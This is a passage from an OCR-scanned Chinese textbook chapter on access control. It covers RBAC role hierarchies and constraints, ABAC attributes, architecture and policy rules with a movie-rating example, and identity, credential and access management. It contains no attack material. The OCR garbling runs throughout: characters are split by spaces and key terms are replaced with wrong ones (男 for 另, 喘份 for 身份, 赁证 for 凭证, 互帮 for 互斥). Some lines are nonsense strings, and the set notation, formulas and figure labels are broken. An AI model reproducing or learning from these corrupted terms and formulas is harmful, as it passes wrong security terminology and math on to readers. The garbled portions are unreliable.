与 角色 之 间 是 多 对 多 的 关系 : 一 个 用 户 可 以 有 多 个 角色 ， 多 个 用 户 可 以 被 分 配给 一 个 角色 。 类 
似 地 ， 角 色 与 许可 之 间 也 是 多 对 多 的 关系 。 会 话 用 来 定义 用 户 与 该 用 户 被 分 配 的 一 个 或 多 个 角 
色 之 间 的 一 对 多 的 临时 关系 。 用 户 仅 与 完成 特定 任务 所 必需 的 角色 建立 会 话 。 这 是 最 小 特权 概 
念 的 一 个 实例 。 


RBAC, 
统一 模型 


RBAC, RBAC, 
角色 层次 约束 


RBAC, 
基本 模型 
a) RBAC 模 型 间 的 关系 b) RBAC 模 型 
图 4-8 基于 角色 的 访问 控制 模型 家 族 。RBAC。 是 访问 控制 系统 的 最 低 要 求 ，RBAC, 增加 了 
角色 层次 ，RBAC,; 增加 了 约束 ，RBAC; 包括 RBAC, 和 RBAC; 


用 户 与 角色 之 间 以 及 角色 与 许可 之 间 的 多 对 多 关系 提供 了 常规 DAC 方案 不 能 实现 的 分 配 
的 灵活 性 与 多 粒度 性 。 没 有 这 种 灵活 性 与 多 粒度 性 ， 就 会 有 更 大 的 风险 ， 因 为 对 被 允许 的 访问 
类 型 的 控制 有 限 ， 用 户 可 能 被 授予 超过 其 需要 的 对 资源 的 访问 权 。NIST RBAC 文档 给 出 了 下 
面 的 例子 : 用 户 可 能 需要 列 出 目录 内 容 ， 修 改 已 存在 的 文件 而 不 创建 新 文件 ， 或 者 他 们 可 能 需 
要 对 文件 追加 记录 而 不 修改 已 存在 的 记录 。 


表 4-4 RBAC 模型 作用 域 








模型 层次 约束 
RBAC, a 
ye F 
RBAG, E i 
角色 层次 一 RBAC， 角色 层次 提供 了 总 监 
一 种 反映 组 织 中 角色 层次 结构 的 方式 。 一 般 
责任 越 大 的 工作 岗位 获得 的 访问 资源 的 权限 项 目 主管 1 项 目 主管 2 
越 多 。 下 级 工作 岗位 的 访问 权 可 能 是 上 级 岗 a Po 
位 的 一 个 子 集 。 角 色 层 次 利用 继承 的 概念 使 生产 | fit | Ea , it 
得 一 个 角色 能 够 隐 式 地 包含 与 其 下 级 角色 关 
联 的 访问 权 。 na it 
图 4-9 是 角色 层次 图 的 一 个 例子 。 按 照 工程 师 1 Lem 
约定 ， 将 下 级 角色 画 在 下 面 。 两 个 角色 之 间 
的 连 线 表示 上 面 角 色 包 含 下 面 角色 的 所 有 访 工程 部 


问 权 及 下 面 角色 不 具有 的 其 他 访问 权 。 一 个 图 4-9 角色 层次 的 实例 
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角色 可 以 从 多 个 下 级 角色 继承 访问 权 。 例 如 ,在 图 4-9 中 , TAF (Project Lead) 角色 包含 
生产 工程 师 角 色 和 质量 工程 师 角 色 的 所 有 访问 权 。 多 个 角色 也 可 以 继承 同一 个 下 级 角色 。 例 
如 ， 生 产 工 程 师 角色 和 质量 工程 师 角 色 都 包含 工程 师 角色 的 访问 权 。 上 此外， 生产 工 程 师 角色 还 
有 其 他 的 访问 权 ， 质 量 工程 师 角 色 也 还 有 男 一 组 不 同 的 访问 权 。 因 而 ， 这 两 种 角色 具有 重合 的 
访问 权 ， 也 就 是 它们 与 工程 师 角 色 共 享 的 访问 权 。 

约束 一 一 RBAC。 约束 提供 了 一 种 令 RBAC 适应 组 织 中 的 管理 和 安全 策略 细节 的 手段 。 
约束 是 在 角色 之 间 定 义 的 关系 或 与 角色 相关 的 条 件 。[SAND96] 列 出 了 下 面 这 些 类 型 的 约束 : 
互 帮 角色 、 基 数 和 先决 角色 。 

BRAE (mutually exclusive role) 指 一 个 用 户 只 能 被 分 配给 集合 中 的 一 个 角色 。 这 个 限制 
可 以 是 静态 的 ， 也 可 以 是 动态 的 ， 后 者 的 含义 是 在 一 次 会 话 中 一 个 用 户 仅 能 被 分 配给 集合 中 的 
一 个 角色 。 互 斥 约束 支持 一 个 组 织 中 的 职责 和 能 力 的 分 离 。 这 种 分 离 可 以 通过 使 用 同一 集合 上 
的 互 斥 许可 分 配 来 加 强 或 提高 。 连 同 这 个 附加 约束 ， 互 斥 角 色 集 具有 下 列 性 质 : 

1. 一 个 用 户 (在 会 话 中 或 静态 地 ) 只 能 被 分 配给 集合 中 的 一 个 角色 。 

125 2. 任何 许可 (访问 权 ) 只 能 被 授予 给 集合 中 的 一 个 角色 。 

因而 互 太 角色 集 具 有 不 重 县 的 许可 。 如 果 两 个 用 户 被 分 配给 集合 中 的 不 同 角 色 ， 那 么 用 户 
担任 这 些 角 色 时 具有 不 重 共 的 许可 。 互 矿 角 色 的 目的 是 增加 有 具有 不 同 能 力 、 不 同 工 作 职 责 的 个 
体 色 结 起 来 破坏 安全 策略 的 难度 。 

基数 (cardinality) 指 设置 关于 角色 的 最 大 数值 。 这 种 类 型 的 一 个 约束 是 设置 可 以 分 配给 一 
个 指定 角色 的 最 大 用 户 数 。 例 如 ， 项 目 主管 角色 或 部 门 总 监 角 色 一 般 被 限制 于 一 个 用 户 。 系 统 
也 可 以 强制 约束 一 个 用 户 可 以 被 分 配 到 的 角色 数 ， 或 者 一 个 用 户 在 一 次 会 话 中 可 以 被 激活 的 角 
色 数 。 男 一 种 形式 的 约束 是 设 定 可 以 被 授予 某 个 特定 许可 的 最 大 角色 数 ， 这 对 于 敏感 或 功能 强 
大 的 许可 是 很 有 意义 的 。 

系统 还 可 以 指定 先决 条 件 (prerequisite)， 用 来 规定 [0] 如 果 已 被 分 配给 另 一 个 指定 角色 时 ， 
用 户 只 能 被 分 配 一 个 特定 角色 。 先 决 条 件 可 以 用 来 构建 最 小 特权 概念 的 实现 。 在 一 个 层次 中 ， 
可 以 要 求 用 户 仅 当 已 被 分 配 直接 下 级 〈 低 级 ) 角色 ， 才 能 被 分 配 上 级 (高 级 ) 角色 。 例 如 , 在 
图 4-9 中 ， 被 分 配 了 项 目 主 管 角 色 的 用 户 必 须 也 被 分 配 下 级 的 生产 工程 师 和 质量 工程 师 角 色 。 
这 样 ， 如 果 用 户 在 一 个 指定 任务 中 不 需要 项 目 主管 角色 的 全 部 许可 ， 他 可 以 调用 会 话 来 使 用 仅 
仅 需 要 的 下 级 角色 。 注 意 ， 要 使 用 层次 概念 的 先决 条 件 ， 必 须 采 用 RBAC; 模型 。 


46 ”基于 属性 的 访问 控制 


访问 控制 技术 的 一 项 较 新 的 进展 是 基于 属性 的 访问 控制 ( Attribute-Based Access Control, 
ABAC) 模型 。ABAC 模型 能 够 定义 表达 资源 和 主体 二 者 属性 条 件 的 授权 。 例 如 ， 考 虑 这 样 一 
种 配置 ， 其 中 每 个 资源 都 具有 一 个 属性 ， 用 以 标识 创建 该 资源 的 主体 。 然 后 ， 用 单一 的 访问 
规则 来 指定 每 一 个 资源 的 所 有 创建 者 的 所 有 者 特权 。ABAC 方法 的 优势 在 于 它 的 灵活 性 以 及 
表达 能 力 。[PLAT13] 指出 ABAC 应 用 于 真实 系统 的 主要 障碍 是 ， 需 要 考虑 每 次 访问 对 资源 和 
用 户 属 性 的 评价 所 造成 的 性 能 影响 。 然 而 ， 对 于 某 些 应 用 诸如 Web 服务 和 云 计算 的 综合 运用 ， 
每 次 访问 所 增加 的 性 能 代价 相对 于 本 已 相当 高 的 性 能 代价 是 微不足道 的 。 因 而 ，Web 服务 是 
实现 ABAC 模型 的 开创 性 技术 ， 尤 其 是 引入 了 可 扩展 的 访问 控制 标记 语言 (eXtensible Access 
Control Markup Language, XACML) [BECU13]， 并且 也 有 人 对 将 ABAC 模型 应 用 到 云 服 务 表 
现 出 相当 大 的 兴趣 [IQBA12,YANG12]。 

ABAC 模型 有 三 个 关键 要 素 : 属性 ， 为 配置 中 的 实体 而 定义 ; 策略 模型 ， 定义 ABAC K 

略 ; 以 及 架构 模型 ， 应 用 于 实施 访问 控制 的 策略 。 我 们 将 依次 研究 这 些 要 素 。 
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46.1 属性 


属性 用 来 定义 主体 、 客 体 、 环 境 条 件 或 机 构 预 定义 上 且 预 分 派 的 要 求 操 作 的 特定 方面 的 特 
征 。 属 性 包含 的 信息 表明 了 由 属性 所 提供 的 类 别 信息 、 属 性 名 称 和 属性 值 ( 例 如 ，Class = 
Hospital RecordsAccess, Name = PatientInformationAccess, Value = MFBusinessHoursOnly ) 。 

下 面 是 ABAC 模型 中 属性 的 三 种 类 型 : 

e 主体 属性 : 主体 是 一 个 主动 的 实体 (如 用 户 、 应 用 、 进 程 或 设备 )， 能 引起 客体 间 的 信 

息 流动 或 者 系统 状态 的 改变 。 每 个 主体 都 有 能 够 定义 其 号 份 和 特征 的 关联 属性 。 这 些 
属性 可 以 包含 主体 的 标识 符 、 名 称 、 组 织 、 职 务 等 。 主 体 的 角色 也 可 被 视 为 一 项 属性 。 

。 客体 属性 : 客体 ， 也 被 称 为 资源 ， 是 一 个 (在 给 定 请 求 的 语 境 中 ) 被 动 的 包含 或 接收 信 

息 的 与 信息 系统 相关 的 实体 (如 设备 、 文 件 、 记 录 、 表 、 进 程 、 程 序 、 网 络 、 域 )。 与 
主体 一 样 ， 客 体 具 有 可 以 用 来 制定 访问 控制 决策 的 属性 。 例 如 ， 一 份 Microsoft Word 
文档 ， 可 以 具有 诸如 标题 、 主 题 、 日 期 和 作者 之 类 的 属性 。 客 体 属 性 也 常常 从 客体 元 
数据 中 提取 。 尤 其 是 ， 各 种 各 样 的 Web 服务 的 元 数据 属性 可 能 会 和 访问 控制 的 目的 相 
关 ， 比 如 所 有 权 、 服 务 分 类 法 甚至 服务 质量 (QoS) 属性 。 

。 环境 属性 : 这 类 属性 到 目前 为 止 ， 在 很 大 程度 上 被 大 多 数 访问 控制 规则 所 忽视 。 它 们 
描述 了 信息 访问 发 生 时 所 处 的 运行 的 、 技 术 的 甚至 态势 的 环境 或 情境 。 例 如 ， 当 前 日 
期 与 时 间 、 当 前 病毒 /黑客 活动 、 网 络 安全 级 别 (如 因特网 与 内 联网 的 比较 ) 等 属性 并 
不 与 某 个 特定 的 主体 或 资源 相关 联 ， 但 或 许 会 与 应 用 访问 控制 策略 相关 。 

ABAC 是 一 种 可 以 区 别 的 逻辑 访问 控制 模型 ， 因 为 它 通 过 对 实体 (主体 和 客体 ) 属性 、 操 
作 及 与 请 求 相关 的 环境 的 评价 规则 来 控制 对 客体 的 访问 。ABAC 依赖 于 对 给 定 环境 中 的 主体 属 
性 、 客 体 属性 以 及 定义 主客 体 属 性 组 合 所 允许 操作 的 形式 化 联系 或 访问 控制 规则 的 评价 。 所 有 
的 ABAC 解决 方案 包含 这 些 基 础 的 核心 能 力 ， 以 评价 属性 并 执行 规则 或 者 这 些 属性 间 的 联系 。 
ABAC 系统 能 够 实现 DAC、RBAC 和 MAC 的 思想 。ABAC 能 够 实现 细 粒 度 的 访问 控制 ， 允 
许 更 大 规模 的 离散 式 输入 进入 访问 控制 决策 ， 并 且 提 供 更 大 的 可 能 的 变量 组 合集 合 ， 以 此 来 反 
映 更 大 且 更 明确 的 可 能 规则 、 策 略 或 访问 限制 的 集合 。 因 此 ，ABAC 允许 无 限 数 量 的 属性 组 合 
起 来 以 满足 任何 访问 控制 规则 。 此 外 ，ABAC 系统 还 能 通过 充分 发 挥 ABAC 灵活 性 的 高 级 表 
达 策 略 模型 ， 来 满足 来 自 基本 访问 控制 列表 的 各 种 各 样 的 要 求 。 


4.6.2 ABAC 逻辑 架构 


图 4-10 说 明了 ABAC 系统 的 基本 组 件 的 逻辑 架构 。 主 体 对 客体 的 一 次 访问 将 遵循 下 列 步 
又 进行 : 

1. 主体 问 客体 提出 访问 请 求 。 该 请 求 被 路 由 到 一 个 访问 控制 疙 置 。 

2. 该 访问 控制 装置 通过 一 组 由 预先 配置 的 访问 控制 策略 所 定义 的 规则 (2a) 进行 控制 。 基 
于 这 些 规则 ， 访 问 控制 装置 对 主体 (2b)、 客 体 (2c) 和 当前 环境 条 件 (2d) 的 属性 进行 评估 ， 
决定 是 否 授权 。 

3. 若 访问 获得 授权 ， 则 访问 控制 机 制 授权 主体 访问 客体 ; 若 访问 未 被 授权 ， 则 拒绝 访问 。 

从 上 述 逻 辑 架 构 中 可 以 清楚 地 看 到 ， 访问 控制 决策 由 四 个 彼此 独立 的 信息 源 决 定 。 系 统 设 
计 者 可 以 决定 ， 对 于 涉及 主体 、 客 体 和 环境 条 件 的 访问 控制 来 说 ， 哪 些 属性 是 重要 的 。 接 着 ， 
系统 设计 者 或 其 他 机 构 就 能 够 以 规则 的 形式 对 主体 、 客 体 和 环境 条 件 的 任何 可 能 的 属性 组 合 定 
义 访 问 控制 策略 。 显 然 这 种 方法 非常 有 效 并 且 灵 活 。 然 而 ， 它 的 成 本 ， 无 论 是 在 设计 与 实现 的 
复杂 度 方面 ， 还 是 在 性 能 影响 方面 ， 都 很 可 能 超过 其 他 访问 控制 方式 。 这 是 系统 运行 单位 所 必 
须 进 行 的 权衡 。 
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客体 属性 环境 条 件 








访问 控 
om 制 机 制 
主体 ( 用户) 





访问 控制 策略 
图 4-10 ABAC 情景 


图 4-11 [摘自 NIST SP 800-162 (基于 属性 的 访问 控制 (ABAC) 定义 和 注意 事项 指南 ， 
2014 年 1 月 ) ] 提供 了 一 种 实用 的 方法 来 理解 ABAC 模型 与 采用 访问 控制 列表 (ACL) 的 DAC 
模型 的 范围 的 比较 。 该 图 不 仅 说 明了 这 两 种 模型 的 相对 复杂 度 ， 还 阐明 了 这 两 种 模型 的 信任 
要 求 。 通 过 对 于 ACL 和 ABAC 分 别 采 用 的 有 代表 性 的 信任 关系 〈 用 箭头 线 表 示 ) 的 比较 表明 ， 
要 想 ABAC 正常 工作 ,需要 许多 更 加 复杂 的 信任 关系 。 忽 略图 4-11 两 个 部 分 的 共性 内 容 ,， 我 
们 可 以 观察 到 ，ACL 中 的 信任 根 在 于 客体 拥有 者 ， 他 通过 向 ACL 添加 用 户 来 提供 对 客体 的 访 
问 从 而 最 终 实 现 客体 访问 规则 。 而 在 ABAC 中 ， 信 任 根来 自 于 客体 拥有 者 没有 控制 权 的 很 多 
方面 ， 比 如 主体 属性 机 构 、 策 略 开 发 者 和 凭证 发 放 者 。 因 此 ，SP 800-162 建议 ， 应 该 组 建 一 个 
企业 治理 实体 来 管理 所 有 身份 、 赁 证、 访问 管理 能 力 的 部 署 和 运行 ， 且 每 个 下 级 组 织 应 该 维护 
一 个 相似 的 实体 ， 以 确保 在 管理 与 企业 实施 ABAC 相关 的 部 署 和 范式 转移 方面 的 一 致 性 。 另 
外 ， 它 还 建议 企业 开发 一 个 信任 模型 ， 用 来 说 明 信 任 关系 并 帮助 确定 信息 和 服务 的 所 有 权 和 责 
任 、 对 额外 的 策略 和 治理 的 需要 以 及 对 用 来 确认 或 实施 信任 关系 的 技术 解决 方案 的 要 求 。 信 任 
模型 可 以 用 来 帮助 说 服 组 织 在 对 信息 如 何 使 用 与 保护 有 明确 预期 的 情况 下 分 享 信 息 ， 还 可 以 用 
来 信任 来 自 其 他 组 织 的 信息 、 属 性 和 授权 断言 。 


4.6.3 ABAC 策略 


策略 (policy) 是 一 组 用 来 管理 组 织 内 部 的 允许 行为 的 规则 和 关系 ， 其 基础 是 主体 所 具有 
的 特权 ， 以 及 在 哪 种 环境 条 件 下 资源 或 客体 需要 被 保护 。 反 过 来 ， 特权 (privilege) 代表 主体 
的 授权 行为 ; 它们 由 机 构 定 义 并 体现 在 策略 中 。 其 他 常用 来 代替 特权 的 术语 有 权利 (right)、 授 
权 ( authorization) 和 资格 ( entitlement)。 策 略 通常 是 从 需要 保护 的 客体 以 及 主体 可 用 的 特权 角 
度 编 写 的 。 

现在 我 们 定义 一 个 ABAC 策略 模型 ， 此 模型 基于 [YUAN05] 中 提出 的 模型 。 我 们 使 用 如 
下 约定 : 
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恰当 凭证 发 放 
凭证 确认 
凭证 保护 强度 
















网 络 认证 
网 络 任 证 


物理 访问 


客体 访问 规则 实施 
组 管理 





恰当 凭证 发 放 权威 主体 属性 存储 < 一 一 权威 客体 属性 


任 证 确认 属性 供应 公共 客体 属性 
凭证 保护 强度 公共 主体 属性 分 类 法 分 类 法 


属性 完整 性 属性 完整 性 


en 





wha 客体 访问 规则 实施 
物理 访问 网 络 认证 es 
网 络 凭 证 
组 管理 


一 [一 数字 身份 供应 





b) ABAC 信 任 链 
图 4-11 ACL 和 ABAC 的 信任 关系 


1. S$、O 和 EE 分 别 代表 主体 、 客 体 和 环境 ; 
2. SAk (1<k<K), OAn (1<m<M) Ñ EA, (1SnS<N) 分 别 是 预先 定义 的 主体 、 客 体 和 
环境 的 属性 ; 
3. ATTR(s)、ATTR(o) 和 ATTR(e) 分 别 是 主体 s、 客 体 o 和 环境 e 的 属性 赋值 关系 : 
ATTR(s) C SA; * SAs Š www X SAg 


ATTR (r) C OA, x OA>z Se see X OAm 
ATTR(o) CEA, x EA, x ... x EAy 


我 们 也 采用 函数 记 法 来 表示 对 单一 属性 的 赋值 。 例 如 : 


Role(s) = “Service Consumer” 
ServiceOwner(o) = “XYZ, Inc.” 
CurrentDate(e) = “01-23-2005” 


4. 在 大 多 数 情 况 中 ， 确 定 在 特定 环境 e PEK s 是 否 能 够 访问 客体 o 的 策略 规则 ， 是 属性 
s, o 和 WARA: 
Rule: can_access (s, Or e) < f(ATTR(s), ATTR (o), ATTR(e) ) 


给 定 所 有 属性 s、o Ale 的 赋值 ， 如 果 函 数值 为 真 ， 则 授权 访问 资源 ;， 否则， 拒绝 访问 。 
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5. — SRRA EA RES PATA DX. AT AZ SCE I, FEL ahs PCY YR EKMA 
体 。 访 问 控制 决策 进程 本 质 上 相当 于 对 策略 存储 区 中 的 适用 策略 规则 的 评价 。 

现在 我 们 考虑 一 个 网 上 娱乐 商店 的 例子 ， 该 商店 向 用 户 提供 流 式 电影 并 收取 包月 费 。 我 们 
用 这 个 例子 来 对 RBAC 和 ABAC 方法 进行 对 比 。 该 商店 必须 实施 下 列 基于 用 户 年 龄 和 电影 内 
容 评级 的 访问 控制 规则 : 


电影 评级 允许 访问 的 用 户 
R 17 岁 及 以 上 

PG-13 13 岁 及 以 上 
G 任何 人 


在 RBAC 模型 中 ， 每 位 用 户 往 往 在 注册 时 被 分 配 到 成 年 、 未 成 年 或 儿童 三 种 角色 中 的 其 中 
一 种 。 与 此 对 应 将 创建 三 种 许可 : 可 以 观看 R 级 电影 ;可 以 观看 RG-13 级 电影 ; 可 以 观看 G 
级 电影 。 成 年 角色 获得 所 有 三 种 许可 ， 未 成 年 角色 获得 观看 PG-13 级 电影 和 G 级 电影 的 许可 ， 
而 儿童 角色 只 能 获得 观看 G 级 电影 的 许可 。 用 户 到 角色 的 分 派 和 许可 到 角色 的 分 派 都 需要 人 
TEM, 

该 应 用 的 ABAC 方法 则 并 不 需要 显 式 定 义 角 色 。 相 反 ， 用 户 4 是否 能 够 访问 或 观看 电影 
m (此 处 忽略 了 安全 环境 e) 将 通过 评价 如 下 策略 规则 来 决定 : 

Rl:can_access(u, m, e) © 
(Age (u) > 17 A Rating(m) E {R, PG-13, G}) V 
(Age (u) > 13 A Age (u) < 17 A Rating (m) E {PG-13, G}) V 
(Age (u) < 13 A Rating (m) E {G}) 


其 中 ， 年 龄 和 评级 分 别 是 主体 和 客体 的 属性 。 这 里 展示 的 ABAC 模型 的 优势 在 于 它 消 除了 对 静 
态 角 色 的 定义 和 管理 ， 从 而 消除 了 对 用 户 到 角色 的 分 派 及 许可 到 角色 的 分 派 所 需 的 管理 工作 . 

当 我 们 执行 细 粒 度 策略 时 ，ABAC 的 优势 将 更 加 显而易见 。 例 如 ， 假设 根据 电影 的 发 行 日 
期 与 当前 日 期 的 距离 ， 把 电影 分 为 新 片 和 老 片 两 类 ; 同时 依据 用 户 的 付费 模式 将 用 户 分 为 高 级 
用 户 和 普通 用 户 两 类 。 我 们 将 执行 一 项 策略 ， 只 有 高 级 用 户 能 够 观看 新 片 。 而 对 于 RBAC 模 
式 ， 我 们 必须 把 角色 的 数量 翻 倍 ， 从 而 才能 够 把 用 户 按照 年 龄 和 付费 模式 进行 区 分 ， 相 应 地 也 
要 把 许可 的 数量 翻 倍 。 

一 般 地 ， 如 果 有 天 个 主体 属性 和 M 个 客体 属性 ， 并 且 对 每 个 属性 ，Range() 表示 属性 可 能 
取 值 的 范围 ， 那 么 RBAC 模型 所 需要 的 角色 和 许可 的 数量 分 别 是 : 


K M 
I] Range (SA;) and Il Range (SA,,) 
k=1 m=1 


因而 我 们 可 以 看 到 ， 随 着 属性 数量 为 满足 细 粒 度 策略 而 逐步 增加 ， 和 角色 和 许可 的 数量 将 按 
照 指 数 方 式 增长 。 相 反 地 , ABAC 模型 却 以 一 种 高 效 的 方式 来 处 理 额外 的 属性 。 在 上 述 例子 中 ， 
预先 定义 的 策略 RI 仍然 适用 。 我 们 需要 定义 两 条 新 的 规则 : 
R2:can_access(u, m e) 
(MembershipType (u) = Premium) V 
(MembershipType (u) = Regular A MovieType (m) = OldRelease) 
R3:can_access(u, m, e@)«R1A R2 


使 用 ABAC 模型 ， 增 加 环境 属性 也 非常 简单 。 假 设 我 们 希望 添加 一 条 新 规则 ， 表 述 如 下 : 
普通 用 户 可 在 促销 期 间 观看 新 电影 。 这 很 难 用 RBAC 模型 表达 。 但 在 ABAC 模型 中 ， 我 们 只 
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需要 增加 一 条 合 取 (AND) 规则 ， 来 检查 环境 属性 “当前 日 期 ”是 否 处 于 促销 期 中 。 
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现在 我 们 研究 一 种 以 属性 为 中 心 的 访问 控制 方法 所 涉及 的 一 些 概念 。 本 节 主 要 对 上 身份 、 赁 
证 和 访问 管理 (CAM) 的 概念 进行 概述 ，4.8 节 将 探讨 使 用 信任 框架 来 交换 属性 。 
ICAM 是 一 种 用 来 管理 和 实现 数字 身份 (及 相关 属性 )、 和 凭证 和 访问 控制 的 综合 性 方法 。 
ICAM 由 美国 政府 开发 ， 但 其 并 非 仅 适用 于 政府 机 构 ， 还 可 以 由 寻求 访问 控制 统一 方法 的 企业 
来 部 署 。ICAM BE: 
e 创建 个 体 以 及 ICAM 文件 中 所 谓 的 “ 非 人 实体 ”( NPE) 的 可 信和 数字 里 份 表示 。 后 者 包 
插 寻 求 资源 访问 许可 的 进程 、 应 用 程序 和 自动 化 设备 。 

e 将 这 些 身份 绑 定 到 可 能 为 个 体 或 NPE 提供 访问 交易 代理 的 凭证 。 和 凭证 是 一 个 对 象 或 数 
据 结构 ， 将 身份 (及 可 选 的 附加 属性 ) 权威 地 绑 定 到 用 户 所 拥有 并 控制 的 权 标 。 

© 使 用 凭证 对 机 构 资 源 提供 授权 访问 。 

图 4-12 描述 了 ICAM 架构 的 逻辑 组 件 。 我 们 将 在 后 续 小 节 中 研究 每 一 个 主要 组 件 。 


4.7.1 身份 管理 


身份 管理 关注 的 是 将 属性 分 配 到 数字 身份 上 去 ， 并且 将 数字 身份 与 个 体 或 NPE 连接 起 来 。 

其 目标 是 建立 一 个 独立 于 特定 应 用 或 情境 的 可 信 的 数字 身份 。 传 统 的 且 仍 在 广泛 使 用 的 应 用 和 

程序 访问 控制 方法 是 为 使 用 这 些 资 源 创建 一 个 数字 化 表示 的 喘 份 。 结 果 ， 维 护 和 保护 映 份 目 喘 

被 视 为 仅 次 于 与 应 用 相关 的 任务 。 而 且 ， 建立 这 些 面 向 特定 应 用 的 身份 将 导致 大 量 重复 性 工作 。 

与 用 来 登录 网 络 、 系 统 或 应 用 的 账户 不 同 ， 企 业 喘 份 记录 并 不 与 职位 、 职 责 、 位 置 或 者 是 

否 需要 访问 特定 系统 相关 联 。 这 些 项 可 能 成 为 与 企业 身份 记录 相关 联 的 属性 ， 也 可 能 成 为 特定 

应 用 中 个 体 唯 一 身份 标识 的 一 部 分 。 访 问 控制 决策 将 依据 情境 和 用 户 的 相关 属性 ， 而 非 仅仅 依 

据 其 身份 。 企 业 身 份 的 概念 是 ,个 体 将 会 有 其 身份 的 单一 数字 化 表示 ， 用 来 实现 跨 部 门 、 跨 机 
构 的 多 种 用 途 ， 其 中 包括 访问 控制 。 
和 凭证 管理 





“访问 管理 





图 4-12 身份、 凭证 和 访问 管理 (ICAM) 
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图 4-12 描述 了 身份 管理 的 核心 功能 。 数 字 身 份 的 建立 一 般 从 作为 入 职 过 程 一 部 分 的 身份 
数据 采集 开始 。 数 字号 份 通常 是 由 一 组 属性 组 成 的 ， 这 些 属性 聚合 起 来 用 于 在 系统 或 企业 内 部 
唯一 标识 一 个 用 户 。 为 了 建立 对 数字 身份 所 代表 的 个 体 的 信任 ， 机 构 也 可 以 进行 背景 调查 。 个 
体 的 属性 可 以 保存 在 机 构 内 部 各 种 不 同 的 权威 源 ， 链 接 形 成 企业 视角 的 数字 身份 。 该 数字 身份 
可 以 提供 给 应 用 ， 以 便 支 持 物理 上 和 逻辑 上 的 访问 〈 访 问 管理 的 一 部 分 ) ; 当 不 再 需要 访问 时 
则 取消 提供 。 

身份 管理 的 最 后 一 个 要 素 是 生命 周期 管理 ， 包 括 以 下 内 容 : 

© 保护 个 人 身份 信息 的 机 制 、 策 略 和 规程 。 

© 控制 对 身份 数据 的 访问 。 

© 用 于 将 权威 号 份 数据 分 享 给 相关 应 用 的 技术 。 

。 撤销 企业 身份 。 


47.2 ”凭证 管理 


如 前 所 述 ， 赁 证 是 一 个 对 象 或 数据 结构 ， 其 将 身份 (及 可 选 的 附加 属性 ) 权威 地 绑 定 到 用 
户 所 拥有 并 控制 的 权 标 。 赁 证 的 实例 包括 智能 卡 、 私 有 /公开 密 钥 和 数字 证 书 。 和 凭证 管理 是 对 
凭证 生命 周期 的 管理 。 和 凭证 管理 包括 下 列 5 个 逻辑 组 件 : 

1. 授权 的 个 体 发 起 需要 凭证 的 个 体 或 实体 建立 对 凭证 的 需求 。 例 如 ， 部 门 主管 发 起 部 门 
员工 。 

2. 受 发 起 的 个 体 注册 凭证 ， 该 过 程 一 般 包 括 证 明 身 份 、 采 和 集 个 人 经 历 与 生物 特征 数据 。 这 
个 步骤 可 能 还 涉及 合并 由 身份 管理 组 件 维护 的 权威 属性 数据 。 

3. 凭证 生成 。 根 据 赁 证 类 型 ， 生 成 过 程 可 能 涉及 加 密 、 使 用 数字 签名 、 生 成 智能 卡 及 其 他 
功能 。 

4. 凭证 颁发 给 个 体 或 NPE. 

$. 最 后 ， 凭 证 必须 在 其 生命 周期 内 得 到 维护 ， 可 能 涉及 撤销 、 补 发 /替换 、 重 新 注册 、 到 
期 、 个 人 标识 码 (PIN) 重 置 、 挂 起 或 者 恢复 等 。 


4.7.3 访问 管理 


访问 管理 组 件 对 实体 被 授权 访问 资源 的 方法 进行 管理 和 控制 。 它 包括 逻辑 上 和 物理 上 的 访 
问 ， 可 以 在 系统 内 部 ， 也 可 以 在 外 部 单元 。 访 问 管理 的 目的 是 ， 确 保 当 个 体 试图 访问 安全 敏感 
的 建筑 物 、 计 算 机 系统 或 数据 时 ， 进 行 适当 的 身份 验证 。 访 问 控制 功能 单元 会 利用 请 求 访 问 者 
提交 的 凭证 及 其 数字 身份 。 企 业 级 的 访问 控制 设施 需要 以 下 三 个 支持 要 素 : 

© 资源 管理 : 该 要 素 主 要 为 需要 访问 控制 的 资源 制定 规则 。 规 则 包括 凭证 要 求 和 访问 特 

定 功 能 单元 中 的 特定 资源 所 需 的 用 户 属性 、 资 源 属性 和 环境 条 件 。 

。 特权 管理 : 该 要 素 主 要 建立 和 维护 组 成 个 体 访问 轮廓 的 资格 或 特权 属性 。 这 些 属性 代 
表 了 个 体 的 特征 ， 可 以 用 其 作为 制定 访问 物理 和 还 辑 资源 决策 的 基础 。 特 权 被 认为 是 
可 以 链接 到 数字 身份 的 属性 。 

o 策略 管理 : 该 要 素 在 访问 交易 中 控制 什么 是 允许 的 ， 什 么 是 不 允许 的 。 也 就 是 说 ， 给 
出 了 请 求 者 的 号 份 和 属性 、 资 源 或 客体 的 属性 和 环境 条 件 ， 策 略 将 规定 该 用 户 可 以 对 
该 客体 实施 哪些 操作 。 


474 身份 联合 
身份 联合 解决 两 个 问题 : 
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1. 你 如 何 信 任 需 要 访问 自己 系统 且 来 自 外 部 组 织 的 个 体 的 号 份 ? 

2. 当 贵 组 织 中 的 个 体 需 要 与 外 部 组 织 合作 时 ， 你 如 何 保 证 他 们 的 喘 份 ? 

“ 喘 份 联合 ”这 个 术语 用 来 描述 允许 一 个 组 织 信任 由 男 一 个 组 织 创建 和 发 布 的 数字 和 喘 份 、 
身份 属性 与 凭证 的 技术 、 标 准 、 策 略 和 过 程 。 我 们 将 在 下 一 闻 讨 论 喘 份 联合 问题 。 


4.8 信任 框架 


信任 、 身 份 、 属 性 等 相互 联系 的 概念 已 经 成 为 互联 网 企业 、 网 络 服务 提供 者 和 大 型 企业 
关注 的 核心 问题 。 这 可 以 从 电子 商务 建立 过 程 明 显 地 看 出 来 。 为 了 提高 效率 、 保 护 隐 私 并 简化 
法 律 程序 ， 交 易 各 方 一 般 采 用 “须知 ”准则 : 为 了 和 某 人 进行 交易 ， 你 需要 知道 他 哪些 信息 ? 
答案 随 情 况 而 变化 ， 可 以 包含 的 属性 诸如 : 职业 注册 或 执照 号 码 、 组 织 和 部 门 、 职 工 号 、 安 全 
许可 、 客 户 编号 、 信 用 卡号 、 唯 一 健康 标识 号 、 过 人 敏 史 、 血 型 、 社 会 保障 号 码 、 地 址 、 公 民 身 
份 、 社 会 网 络 地 址 、 笔 名 ， 等 等 。 个 体 的 属性 必须 被 知晓 并 且 验 证 后 才能 允许 进行 交易 ， 而 这 
些 属 性 依赖 于 情境 。 

关于 属性 ， 同 样 需要 关注 的 问题 是 它 对 于 所 有 类 型 的 访问 控制 情形 都 愈 发 重要 ， 而 不 仅仅 
是 电子 商务 情境 。 例 如 ， 企 业 可 能 需要 为 客户 、 用 户 、 供 应 商 和 合作 伙伴 提供 资源 的 访问 。 根 
